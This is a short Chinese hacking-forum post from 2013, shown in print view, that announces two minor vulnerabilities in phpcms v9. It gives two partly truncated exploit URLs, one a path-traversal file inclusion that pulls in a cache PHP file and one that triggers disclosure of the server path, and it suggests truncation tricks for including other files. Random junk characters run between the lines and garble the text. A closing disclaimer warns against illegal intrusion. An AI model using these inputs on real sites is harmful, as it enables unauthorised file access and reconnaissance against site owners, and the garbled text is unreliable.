中国网络渗透测试联盟

标题: phpcms v9两个鸡肋漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:28
标题: phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。6 @0 K. T6 H4 X& @
/ j4 o9 n' L6 {2 p, Z7 o
Exp: http://www.php0day.com/api.php?o ... efile=../../../fuck, P  }. L8 h1 X1 ^6 Z- R# q/ m. D

! E+ S8 {2 g& Z#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
% q8 Q8 ]3 g6 g4 D$ X7 v
" I" p$ z0 d# T, w* MExp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
$ O7 z: I# B+ Y* ?
* _1 K$ D) I. f$ l6 I3 n( v- z1 ]! S#暴路径- A3 `6 \7 W( C% Z/ t/ z' G
/ v6 x. @; D2 i( i6 ^1 Z" @% b
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
& O5 V$ t: p6 k6 [3 j
/ F; M8 {  C: R6 d
3 r9 U( C0 i$ O: \) K9 D
, e$ S) r6 z( W$ o( W2 t+ K% J( q+1



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2